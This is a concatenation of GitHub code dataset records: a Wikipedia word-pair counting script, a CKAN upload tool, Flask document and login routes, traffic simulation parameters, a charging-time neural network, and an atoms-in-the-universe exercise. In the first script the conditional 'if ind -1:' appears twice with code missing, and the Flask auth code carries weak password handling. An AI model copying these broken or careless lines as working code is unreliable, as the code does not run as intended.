\"wordpair_counts_vo_{}.pkl\".format(job) # save path for verb-object pair counts \n\n window_size = 5 # radius of context window (but contexts don't cross sentence boundaries)\n \n # connect to CoreNLP server \n dependency_parser = dep_parser(url=path_to_coreNLP_server)\n \n # instantiate wikipedia iterator\n wiki = ws.WikiCorpusBySentence(compressed_wiki, dictionary={})\n articles = wiki.get_texts()\n \n # create mapping from word (string) to index (int), using vocab file\n vocab = []\n with open(vocab_file,\"r\") as f:\n for line in f:\n vocab.append(line.strip(\"\\n\"))\n vocab_dict = defaultdict(lambda : -1) # this will return index -1 if key not found\n for i, w in enumerate(vocab):\n vocab_dict[w] = i\n \n # initialize objects that will keep track of co-occurence counts for both types of syntactic wordpairs\n triple_counts_an = Counter()\n wordpair_counts_an = Counter()\n triple_counts_vo = Counter()\n wordpair_counts_vo = Counter()\n \n # iterate to the correct chunk\n skip = (job-1)*num_articles\n for i in range(skip): \n a = next(articles)\n \n # process each article in the chunk \n for art_num in range(skip,skip+num_articles):\n if art_num % int(num_articles / 100) == 0 and art_num > 0:\n print(\"Just hit article {} out of {} ({}%)\".format(art_num, skip+num_articles, 100*(art_num-skip) / num_articles))\n print(\"Number of triples: {}, {}\".format(len(triple_counts_an),len(triple_counts_vo)))\n \n # save every 500 articles\n\n if art_num % 500 == 0 and art_num > 0:\n with open(save_path_triple_an, \"wb\") as f:\n pickle.dump(triple_counts_an,f)\n with open(save_path_wordpair_an, \"wb\") as f:\n pickle.dump(wordpair_counts_an,f)\n with open(save_path_triple_vo, \"wb\") as f:\n pickle.dump(triple_counts_vo,f)\n with open(save_path_wordpair_vo, \"wb\") as f:\n pickle.dump(wordpair_counts_vo,f)\n \n art = next(articles)\n for snt_num,sent in enumerate(art):\n if len(sent) == 0: # skip over empty sentences...\n continue\n for r in range(0,len(sent),150): # process by chunks of 150 words, since the tagger has memory issues if too big\n text_chunk = 
sent[r:r+150]\n \n try:\n dep = next(dependency_parser.parse(text_chunk)) # dependency parse the chunk\n except:\n print(\"{}\".format(len(text_chunk)))\n continue\n for i in range(len(text_chunk)): # go through each word in the chunk\n dep_dict = dep.get_by_address(i+1)\n head = vocab_dict[dep_dict[\"word\"]]\n if dep_dict[\"tag\"] is None:\n continue\n if (dep_dict[\"tag\"][:2] not in [\"NN\",\"VB\"]) or (head == -1): # if it's not a noun or verb, or not in vocab, skip it\n continue\n\n for ind in dep_dict[\"deps\"][\"amod\"]: # get indices of all dependent adjectives if head is noun\n adj = vocab_dict[dep.get_by_address(ind)[\"word\"]]\n if adj == -1: # if adjective not in dictionary, skip over it\n continue\n wordpair_counts_an[(adj,head)] += 1 # increment the adjective-noun wordpair count\n\n # get context words within 5 words of noun (excluding the dependent adjective)\n if ind -1: # if the context word is in vocab, increment triple count\n triple_counts_an[(adj,head,context_word)] += 1\n for k in range(i+1,min(len(sent),i+1+window_size)):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_an[(adj,head,context_word)] += 1\n else: # if adjective occurs after noun\n for k in range(max(0,i-window_size),i):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_an[(adj,head,context_word)] += 1\n for k in range(i+1,min(len(sent),i+2+window_size)):\n if k+1 != ind:\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1: # if the context word is in vocab, increment triple count\n triple_counts_an[(adj,head,context_word)] += 1\n\n for ind in dep_dict[\"deps\"][\"dobj\"]: # get indices of all direct objects if head is verb\n obj = vocab_dict[dep.get_by_address(ind)[\"word\"]]\n if obj == -1: # if adjective not in dictionary, skip over it\n continue\n wordpair_counts_vo[(head,obj)] += 1 # increment the adjective-noun wordpair count\n\n # get context words within 5 words of verb (excluding the dependent object)\n if ind -1: # if the context word is in vocab, increment triple count\n triple_counts_vo[(head,obj,context_word)] += 1\n for k in range(i+1,min(len(sent),i+1+window_size)):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_vo[(head,obj,context_word)] += 1\n else: # if object occurs after head \n for k in range(max(0,i-window_size),i):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_vo[(head,obj,context_word)] += 1\n for k in range(i+1,min(len(sent),i+2+window_size)):\n if k+1 != ind:\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1: # if the context word is in vocab, increment triple count\n triple_counts_vo[(head,obj,context_word)] += 1\n # save the counters\n with open(save_path_triple_an, \"wb\") as f:\n pickle.dump(triple_counts_an,f)\n with open(save_path_wordpair_an, \"wb\") as f:\n pickle.dump(wordpair_counts_an,f)\n with open(save_path_triple_vo, \"wb\") as f:\n pickle.dump(triple_counts_vo,f)\n with open(save_path_wordpair_vo, \"wb\") as f:\n pickle.dump(wordpair_counts_vo,f)\n \nif __name__ == '__main__':\n main()\n","repo_name":"abefrandsen/syntactic-rand-walk","sub_path":"triple_counts.py","file_name":"triple_counts.py","file_ext":"py","file_size_in_byte":9881,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"34223892118","text":"import 
csv\nimport getopt\nimport json\nimport pprint\nimport re\nimport os\nimport requests\nimport sys\nimport time\n\nfrom cache import settings\n\n\nclass AddDataset:\n def __init__(self):\n self.tags = {\n 'timestamp': '',\n 'entered_by': '',\n 'dataset_name': '',\n 'data_owner': '',\n 'category1': '',\n 'category2': '',\n 'category_notes': '',\n 'source_of_information': '',\n 'source_weblink': '',\n 'dataset_content': '',\n 'geographic_coverage': '',\n 'geographic_units': '',\n 'geography_notes': '',\n 'time_period_from': '',\n 'time_period_to': '',\n 'time_frequency': '',\n 'time_notes': '',\n 'data_type': '',\n 'data_type_notes': '',\n 'data_quality': '',\n 'data_access': '',\n 'data_owner_attitude_to_research_use': '',\n 'other_notes': ''\n }\n\n def convert(self, name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower().replace(' ', '_')\n\n def add_dataset(self, metadata, tags):\n description_keys = [\n 'category_notes',\n 'dataset_content',\n 'source_-_weblink',\n 'time_notes',\n 'data_type_notes',\n 'data_quality',\n 'data_access'\n ]\n\n description = ''\n extras = []\n tags_cleaned = {}\n\n for key, value in tags.items():\n print('converting', key, self.convert(key), value)\n if value:\n extras.append({\n 'key': self.convert(key),\n 'value': value\n })\n tags_cleaned[self.convert(key)] = value\n\n for description_key in description_keys:\n if description_key in tags_cleaned:\n description += '\\n\\n' + tags_cleaned[description_key]\n description = description.strip()\n\n # \\x2D - minus\n # \\x20 space\n # \\x55 dash\n # \\x137 underscore\n # TODO add allowed chars back into this regex\n\n dataset_dict = {\n 'name': re.sub(\n r'[^\\x61-\\x7A]|\\x40|\\x55|\\x137', r'',\n tags_cleaned['dataset_name'].lower()\n ),\n 'owner_org': settings.ckan_org_name,\n\n \"license_title\": None,\n \"maintainer\": None,\n \"private\": False,\n \"maintainer_email\": None,\n \"num_tags\": 0,\n \"author\": None,\n \"author_email\": None,\n \"state\": \"active\",\n \"version\": None,\n \"type\": \"dataset\",\n \"resources\": [\n ],\n \"num_resources\": 0,\n # \"tags\": [tags],\n \"groups\": [\n ],\n \"license_id\": None,\n \"isopen\": None,\n \"url\": None,\n \"notes\": description,\n \"extras\": extras,\n \"title\": tags_cleaned['dataset_name'],\n }\n\n # Make the HTTP request.\n response = requests.post(\n settings.ckan_url + '/api/action/package_create',\n headers={\n 'Authorization': settings.ckan_api_key,\n 'content-type': 'application/json'\n },\n data=json.dumps(dataset_dict))\n print(response.status_code)\n print(response.reason)\n print(response.content)\n print(response.text)\n\n response_dict = response.json()\n # print(response_dict)\n\n # package_create returns the created package as its result.\n # created_package = response_dict['result']\n # pprint.pprint(created_package)\n\n dataset_name = ''\n try:\n print('Added', response_dict['result']['name'])\n pprint.pformat(response_dict)\n dataset_name = response_dict['result']['name']\n\n except:\n dataset_name = re.sub(\n r'[^\\x61-\\x7A]|\\x40|\\x55|\\x137', r'',\n tags_cleaned['dataset_name'].lower().replace(' ', '-')\n )\n\n if tags_cleaned['source_-_weblink']:\n for url in tags_cleaned['source_-_weblink'].split('\\n'):\n url = url.strip()\n if ' ' not in url:\n self.add_resource(\n \"Source - weblink\",\n dataset_name,\n None,\n url\n )\n\n return response.json()\n\n def add_resource(self, resource_name, dataset_name, filepath, url):\n data = json.dumps(\n {\n \"package_id\": 
dataset_name,\n \"url\": url,\n \"name\": resource_name,\n \"format\": \"text/html\"\n })\n print('\\n\\n', data, '\\n\\n')\n\n response = requests.post(\n settings.ckan_url + '/api/action/resource_create',\n data=data,\n headers={\n \"X-CKAN-API-Key\": settings.ckan_api_key,\n 'content-type': 'application/json'\n }\n )\n print(response.text)\n\n def add_csv_dataset(self, csv_filepath, limit=None):\n with open(csv_filepath, 'r', encoding=\"latin-1\") as csv_file:\n dialect = csv.Sniffer().sniff(csv_file.read(1024))\n csv_file.seek(0)\n print('dialect', dialect)\n dr = csv.DictReader(csv_file)\n print(dr.fieldnames)\n\n count = 0\n for row in dr:\n print('Waiting for a second')\n time.sleep(1)\n count += 1\n if limit and count > limit:\n break\n ad.add_dataset({}, row)\n\n\nif __name__ == '__main__':\n\n ad = AddDataset()\n # for arg in sys.argv:\n # print(arg)\n\n inputfile = './metadata_hidden.csv'\n outputfile = ''\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hi:o:\", [\"ifile=\", \"ofile=\"])\n print('OPTS ARGS', opts, args)\n except getopt.GetoptError as e1:\n print(e1)\n print('test.py -i -o ')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print('test.py -i -o ')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n if os.path.isfile(inputfile):\n print('Input file is ', inputfile)\n\n ad.add_csv_dataset(inputfile, limit=None)\n else:\n print('\\nInput file {} missing or unavailable'.format(inputfile))\n\n exit()\n\n # tags = {\n # 'timestamp': '12/15/2015 17:22:29',\n # 'entered_by': 'Sarah',\n # 'dataset_name': 'Annual Survey of Hours and Earnings Pensions categories (Annual Survey of Hours and Earnings (ASHE))',\n # 'data_owner': 'ONS',\n # 'category1': '1 - People',\n # 'category2': '1.1 - Demographics, social',\n # 'category_notes': 'Primarily concerns earnings and hours so broader than cost, price and rent',\n # 'source_of_information': '',\n # 'source_weblink': 'http://www.ons.gov.uk/ons/rel/ashe/annual-survey-of-hours-and-earnings-pension-tables/index.html',\n # 'dataset_content': '1% sample of employee jobs taken from HM Revenue & Customs (HMRC) Pay As You Earn (PAYE) records. ASHE does not cover the self-employed nor does it cover employees not paid during the reference period. In 2015 information related to the pay period. Sample size: 180,000 employee jobs',\n # 'geographic_coverage': '1 - UK',\n # 'geographic_units': 'National',\n # 'geography_notes': '',\n # 'time_period_from': '1998',\n # 'time_period_to': 'On-going',\n # 'time_frequency': 'Annual',\n # 'time_notes': 'The ASHE replaced the New Earnings Survey (NES) which was administered by the ONS since the 1970s.',\n # 'data_type': 'Sample survey',\n # 'data_type_notes': 'Estimates on the levels and distribution of earnings and hours for employees in the UK. 
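The `convert` helper in the add_dataset.py record above turns CamelCase headings into snake_case keys with two chained substitutions; a standalone check of that exact two-pass pattern (the sample inputs here are illustrative):

import re

def to_snake(name):
    # pass 1: insert an underscore before a capitalised word, splitting trailing acronyms
    s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
    # pass 2: split a lower-case letter or digit followed by a capital, lower-case, map spaces
    return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower().replace(' ', '_')

assert to_snake('dataTypeNotes') == 'data_type_notes'
assert to_snake('HTTPResponse') == 'http_response'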
Estimates are available for a variety of breakdowns by age groups, gender, industry, and pension type.',\n # 'data_quality': 'Primary weaknesses identified by ONS include: lack of personal demographic data, timing and periodicity, no coverage of self employed and quality of estimates and low levels of disaggregation can be poor.',\n # 'data_access': 'Free to download from the ONS',\n # 'data_owner_attitude_to_research_use': '',\n # 'other_notes': ''\n # }\n # response = ad.add_dataset({}, tags)\n # dataset_name = ''\n # try:\n # print('Added', response['result']['name'])\n # pprint.pformat(response)\n # dataset_name = response['result']['name']\n #\n # except:\n # dataset_name = re.sub(\n # r'[^\\x61-\\x7A]|\\x40|\\x55|\\x137', r'',\n # tags['dataset_name'].lower().replace(' ', '-')\n # )\n\n\n","repo_name":"whelks-chance/cache","sub_path":"housing_portal/ckan_tools/add_dataset.py","file_name":"add_dataset.py","file_ext":"py","file_size_in_byte":9046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4107198190","text":"from flask import request, jsonify, Blueprint\nfrom flask_cors import cross_origin\nfrom auth import check_token\nfrom documents import Documents\nfrom RestSurvey import get_survey\nimport psycopg2\nimport jwt\n\ndocs = Blueprint('documents', __name__)\ndocuments = Documents()\n\n\n@docs.route('/documents/get_document', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_document():\n try:\n request_data = request.get_json()\n docID = request_data['documentId']\n print('(get_document) extracted id=', docID, ', sending sql query to database')\n result = documents.getDocument(docID)\n print('founded: ', result)\n return (jsonify(\n {\"category\": result[0], \"title\": result[1], \"info\": result[2], \"links\": result[-3], \"short\": result[-4],\n \"image\": result[-1]}), 200) if result else (jsonify(\"false\"), 401)\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_categories')\n@cross_origin(supports_credentials=True)\ndef get_categories():\n try:\n results = documents.getCategories()\n if len(results) == 0:\n return jsonify(\"false\"), 401\n\n acc = []\n for result in results:\n acc.append({\"category\": result[0]})\n return jsonify({\"results\": acc}), 200\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_by_category', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_by_category():\n try:\n request_data = request.get_json()\n category = request_data['category']\n print('Searching for all articles with category: ', category)\n results = documents.getAllByCategory(category)\n print('Articles found: ', len(results))\n if len(results) == 0:\n return jsonify([]), 200\n\n acc = []\n for result in results:\n acc.append(\n {\"id\": result[-2], \"category\": result[0], \"title\": result[1], \"short\": result[-4], \"image\": result[-1]})\n\n return jsonify({\"results\": acc}), 200\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", 
error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_by_name', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_by_name():\n try:\n request_data = request.get_json()\n name = request_data['name']\n print('Filtered keyword: ', name)\n results = documents.getAllByName(name)\n print('Found ', len(results), ' results')\n if len(results) == 0:\n return jsonify({\"results\": []}), 200\n\n acc = []\n for result in results:\n acc.append(\n {\"id\": result[-2], \"category\": result[0], \"title\": result[1], \"short\": result[-4], \"image\": result[-1]})\n return jsonify({\"results\": acc}), 200\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_recommendations', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_recommendations():\n token = request.headers.get('token')\n print('(get_recommendations) received token: ', token)\n try:\n id = check_token(token)\n if not id:\n return jsonify('false'), 401\n\n print('extracting survey from database with userid: ', id)\n surv = get_survey(id)\n if not surv:\n return jsonify(\"false\"), 401\n\n print('survey found.')\n age = surv[1]\n kids = int(surv[2])\n baby = int(surv[3])\n teen = int(surv[4])\n adult = int(surv[5])\n accom = int(surv[6])\n insure = int(surv[7])\n study = int(surv[8])\n job = int(surv[9])\n live = int(surv[10])\n refugee = int(surv[11])\n other = int(surv[12])\n documentType = surv[13]\n results = documents.getRecommendations(id, age, kids, baby, teen, adult, accom, insure, study, job, live,\n refugee, other,\n documentType)\n if len(results) == 0:\n return jsonify([]), 404\n\n acc = []\n for result in results:\n acc.append(\n {\"title\": result[0], \"short\": result[1], \"id\": result[3], \"category\": result[4], \"image\": result[-1]})\n return jsonify({\"results\": acc}), 200\n\n except jwt.ExpiredSignatureError:\n return jsonify('false'), 401\n except jwt.InvalidTokenError:\n return jsonify('false'), 401\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n","repo_name":"actionboyvn/ZPI_VAF","sub_path":"iaff_back/RestDocuments.py","file_name":"RestDocuments.py","file_ext":"py","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12655109007","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 19 11:51:25 2017\r\n\r\n@author: Alice\r\n\"\"\"\r\n\r\nCOEF_DIST_VEHICULE = {'Camion': 1.2, 'Voiture': 1, 'Moto': 0.9,'Poney': 0.4}\r\n\r\nCOEF_DIST_CONDUCTEUR = {'Prudent': 1.33, 'Normal': 1, 'Chauffard': 0.4}\r\n\r\nCOEF_VITESSE_CONDUCTEUR = {'Prudent': 0.8, 'Normal': 1, 'Chauffard': 1.1}\r\n\r\n\r\nPART_VEHICULE = ((('Camion', 0.16), ('Voiture', 0.68), ('Moto', 0.05), ('Poney', 0.01)),\r\n (('Camion', 0.2), ('Voiture', 0.7),('Moto', 0.09), ('Poney', 0.01)))\r\n\r\nPART_CONDUCT = ((('Prudent', 0.08), ('Normal', 0.87), ('Chauffard', 0.05)),\r\n (('Prudent', 0.1), ('Normal', 0.8), ('Chauffard', 0.1)))\r\n","repo_name":"mgaudin/urban-potato","sub_path":"Script/parametre.py","file_name":"parametre.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73609895527","text":"#!/usr/bin/python2\n\n#develop neural network for routine/conservative users reading from csv\n#values in csv have been extrapolated to reach level 15 to start charging\n#values have been rounded to smooth out fluctuations\n#T round by 30 mins, Level binned by 5, FG by 0.1 and dLevel by 5 levels drop\n\n\nimport os\nimport numpy as np\nfrom collections import defaultdict, Counter, OrderedDict\nimport pickle\nfrom datetime import *\nimport csv\nfrom pylab import *\nimport statsmodels as stats\nimport pandas as pd\nimport pandas.tools.plotting as pdtools\nfrom sklearn.neural_network import MLPClassifier\n\n\n#first load csv data into dataframe\n#second filter out all data points for time_left_to_charge <=180 mins\n#aim being we start with making the model accurate for instances close\n#to charging session\n\ndef readCSV(csvF):\n\tdatapoints = []\n\twith open(csvF) as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';')\n\t\theading = next(reader)\n\t\tfor row in reader:\n\t\t\ttime_since_start_discharge = int(row[0])\n\t\t\tlevel_now = int(row[1])\n\t\t\tlevel_drop_since_start = int(row[2])\n\t\t\tforeground_usage_frac = float(row[3])\n\t\t\ttime_left_to_charge = int(row[4])\n\t\t\tif time_left_to_charge <= 600:\n\t\t\t\tdatapoints.append([time_since_start_discharge,level_now,level_drop_since_start,foreground_usage_frac,time_left_to_charge])\n\n\t#now filter datapoints with time_left_to_charge <=180 mins\n\t#X are independent variables and Y is time_left_to_charge,\n\t#round each time_left_to_charge to multiples of 30\n\tprint('*************', len(datapoints))\n\tX = []\n\tY = []\n\tfor i in range(len(datapoints)):\n\t\tX.append([datapoints[i][0], datapoints[i][1], datapoints[i][2], datapoints[i][3]])\n\t\trem = datapoints[i][4]%60\n\t\tif (rem == 0 and datapoints[i][4] != 0) or rem==30:\n\t\t\tnew_tl = datapoints[i][4]\n\t\telif rem < 30:\n\t\t\tnew_tl = int(datapoints[i][4]/60)*60+30\n\t\telse:\n\t\t\tnew_tl = int(datapoints[i][4]/60)*60+60\n\t\t#print('rounded', datapoints[i][4], new_tl)\n\t\tY.append(new_tl)\n\tdict_ = {'X':X, 'Y':Y}\n\treturn dict_\n\ndef neural_network(X, Y):\n\t#now possible outputs are 30, 60, 90, 120, 150, 180, 210, 240, 270, 300, 330, 360, 390, 420, 450, 480, 510, 540, 570, 600: 20 classes\n\t#we will keep the first 400 datapoints of each class for training\n\t#and the next 100 of each class for testing, taken from the motherload X and Y\n\ttrainX = []\n\ttrainY = []\n\ttestX = []\n\ttestY = []\n\t# tally per-class counts: the first 400 examples of a class go to train, the next 100 to test\n\tclass_counts = Counter()\n\tfor i in range(len(Y)):\n\t\tif len(testY) == 20*100 and len(trainY) == 20*400:\n\t\t\tprint('looped till: ', i)\n\t\t\tbreak\n\t\tif class_counts[Y[i]] < 400:\n\t\t\ttrainX.append(X[i])\n\t\t\ttrainY.append(Y[i])\n\t\telif class_counts[Y[i]] < 500:\n\t\t\ttestX.append(X[i])\n\t\t\ttestY.append(Y[i])\n\t\tclass_counts[Y[i]] += 1\n\n\t#now the MLPClassifier model\n\titer_ = 500\n\tm = 15\n\tn = 20\n\tprint('parameters', iter_, m, n)\n\tclf = MLPClassifier(hidden_layer_sizes=(m,n), random_state=1, max_iter=1, warm_start=True)\n\tfor i in range(iter_):\n\t\tclf.fit(trainX, trainY)\n\t\t#print([coef.shape for coef in clf.coefs_])\n\tpred_ = clf.predict(testX)\n\tprint(len(pred_), len(testY), len(trainY))\n\tscore0 = score1 = score2 = score3 = 0\n\tright = []\n\tfor i in range(len(pred_)):\n\t\tif pred_[i] == testY[i]:\n\t\t\tscore0 += 1\n\t\t\t#print(pred_[i], testY[i])\n\t\telif abs(pred_[i] - testY[i]) <=30:\n\t\t\tscore1 += 1\n\t\t\t#print(pred_[i], testY[i])\n\t\telif abs(pred_[i] - testY[i]) <= 60:\n\t\t\tscore2 += 1\n\t\telse:\n\t\t\tscore3 += 1\n\t\t#print('predicted: ', pred_[i], ' real: ', testY[i])\n\tprint(score0, score1, score2, score3, len(pred_))\n\tprint('accuracy', (score0+score1)/len(pred_))\n\ta = 0\n\tb = []\n\tc = 0\n\ttl = 360\n\tfor i in range(len(testY)):\n\t\tif testY[i] == tl:\n\t\t\tif abs(pred_[i] -testY[i]) <=30:\n\t\t\t\ta += 1\n\t\t\telse:\n\t\t\t\tb.append(abs(pred_[i]-testY[i]))\n\t\t\tc += 1\n\tprint('for time left', tl, ':correct=',a,' total=', c)\n\tprint(len(b),np.mean(b),'****************', b)\n\t#plotting\n\tfig = figure(0, dpi=100)\n\terr = []\n\tfor i in range(len(pred_)):\n\t\terr.append(abs(pred_[i] - testY[i]))\n\t#plot(testY,err, 'ro')\n\t#title('Neural Network prediction with 1800 samples for <=180 mins')\n\t#plt.show()\n\nif __name__ == '__main__':\n\t#first check reading csv and creating input/output\n\tdict_ = readCSV('/home/anudipa/pattern/git_scripts/usage-pattern/data/csv/0f73f649f1e0bb371f1fdcadf86f02567670315a.csv')\n\tprint('X', len(dict_['X']))\n\tprint('Y', dict_['Y'][:25])\n\tneural_network(dict_['X'], dict_['Y'])\n","repo_name":"anudipa/usage-pattern","sub_path":"latest/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2091263808","text":"\"\"\"Routes for user authentication.\"\"\"\r\nfrom flask import Blueprint, jsonify, request\r\nfrom flask_login import login_user\r\nfrom models import User, ACCESS\r\nfrom __init__ import login_manager, db\r\nfrom functools import wraps\r\n\r\n# Blueprint Configuration\r\nauth_bp = Blueprint(\r\n 'auth_bp', __name__\r\n)\r\n\r\n\r\n### custom wrap to determine access level ###\r\ndef requires_access_level(access_level):\r\n def decorator(f):\r\n @wraps(f)\r\n def decorated_function(*args, **kwargs):\r\n response = {}\r\n email = request.headers.get('email')\r\n user = User.query.filter_by(email=email).first()\r\n if not user:\r\n response['error'] = f\"Unable to find user with email {email}\"\r\n return jsonify(response)\r\n elif not user.check_password(request.headers.get('password')): # the user is not logged in\r\n response['error'] = f\"Unable to Validate Password\"\r\n return jsonify(response)\r\n if \"|\" in access_level:\r\n if not (user.allowed(access_level.split(\"|\")[0]) and user.allowed(access_level.split(\"|\")[1])):\r\n response['error'] = 'You do not have access to this resource.'\r\n return jsonify(response)\r\n elif not user.allowed(access_level):\r\n response['error'] = 'You do not have access to this resource.'\r\n return 
jsonify(response)\r\n return f(*args, **kwargs)\r\n\r\n return decorated_function\r\n\r\n return decorator\r\n\r\n\r\n@auth_bp.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n response = {}\r\n data = request.get_json()\r\n email = data['email']\r\n user = User.query.filter_by(email=email).first()\r\n if user and user.is_authenticated:\r\n response['text'] = f\"user {user.username} already logged in \"\r\n return jsonify(response)\r\n elif user and user.check_password(password=data['password']):\r\n login_user(user)\r\n response['text'] = f\"logged in {user.username}\"\r\n return jsonify(response)\r\n else:\r\n response['error'] = \"Unable to find user\"\r\n return jsonify(response)\r\n\r\n\r\n@auth_bp.route('/signup', methods=['GET', 'POST'])\r\ndef signup():\r\n \"\"\"\r\n User sign-up page.\r\n\r\n GET requests serve sign-up page.\r\n POST requests validate form & user creation.\r\n \"\"\"\r\n response = {}\r\n data = request.get_json()\r\n email = data['email']\r\n existing_user = User.query.filter_by(email=email).first()\r\n user = User()\r\n if not existing_user:\r\n user.email = data['email']\r\n user.username = data['name']\r\n user.set_password(data[\"password\"])\r\n db.session.add(user)\r\n db.session.commit() # Create new user\r\n login_user(user) # Log in as newly created user\r\n response['text'] = f\"User Signed up {user.email}\"\r\n return jsonify(response)\r\n else:\r\n response['text'] = f\"User {existing_user.email} already exists\"\r\n return jsonify(response)\r\n\r\n\r\n@login_manager.unauthorized_handler\r\ndef unauthorized():\r\n response = {}\r\n \"\"\"Redirect unauthorized users to Login page.\"\"\"\r\n response['error'] = 'You must be logged in to view that page.'\r\n return jsonify(response)\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.get(user_id)\r\n\r\n\r\n@auth_bp.route('/delete_user')\r\n@requires_access_level(ACCESS['admin'])\r\ndef delete_user():\r\n response = {}\r\n data = request.json()\r\n email = data['email']\r\n existing_user = User.query.filter_by(email=email).first()\r\n db.session.delete(existing_user)\r\n db.session.commit()\r\n response['message'] = f'User with email {email} has been deleted.'\r\n return jsonify(response)\r\n\r\n\r\n# control panel\r\n@auth_bp.route('/control_panel')\r\n@requires_access_level('admin')\r\ndef control_panel():\r\n all_users = User.query.all()\r\n serialized_users = []\r\n for usr in all_users:\r\n serialized_users.append(usr.serialize())\r\n return jsonify(serialized_users)\r\n","repo_name":"sskhan67/THE","sub_path":"auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31443153142","text":"\"\"\"Your Place in the Universe Program: Modified for Units of \nKilograms. Modify the Your Place in the Universe program for international\n users, so that the user enters their weight in kilograms, and not\n in pounds. 
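The `requires_access_level` wrapper in the auth.py record above is a three-layer closure: the outer call captures the required level, the middle layer is the actual decorator, and the inner function guards the view. Here is a framework-free sketch of the same pattern; the ACCESS table and user dicts are illustrative assumptions, since the record imports its real ACCESS mapping from models.

from functools import wraps

ACCESS = {'guest': 0, 'user': 1, 'admin': 2}  # assumed shape, not the app's real table

def requires_access_level(level):
    def decorator(f):
        @wraps(f)
        def wrapped(user, *args, **kwargs):
            # reject callers whose role ranks below the required level
            if ACCESS.get(user.get('role'), -1) < ACCESS[level]:
                return {'error': 'You do not have access to this resource.'}
            return f(user, *args, **kwargs)
        return wrapped
    return decorator

@requires_access_level('admin')
def control_panel(user):
    return {'message': 'ok'}

assert control_panel({'role': 'user'}) == {'error': 'You do not have access to this resource.'}
assert control_panel({'role': 'admin'}) == {'message': 'ok'}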
\n\"\"\"\n#initialization\nnum_atoms_universe = 1e80\nweight_avg_person = 70 #70 kg (154 lbs)\nnum_atoms_avg_person = 7e27\n\n#program greeting\nprint(\"\\nHello, this program will determine your place in the universe.\")\n\n#prompt for user's weight in kilograms\nweight_kg = float(input(\"\\nEnter your weight in kilograms: \"))\n\n#determine number of atoms in person\nnum_atoms_person = (weight_kg / weight_avg_person) * num_atoms_avg_person\npercent_of_universe = (num_atoms_person / num_atoms_universe) * 100\n\n#display results\nprint(\"\\nYou contain approximately\", format(num_atoms_person, '.2e'), 'atoms\\n')\nprint(\"Therefore, you comprise\", format(percent_of_universe, '.2e'), '% of the universe\\n')\n","repo_name":"claudmiine/Python-Excercises","sub_path":"Your Place in the Universe.py","file_name":"Your Place in the Universe.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
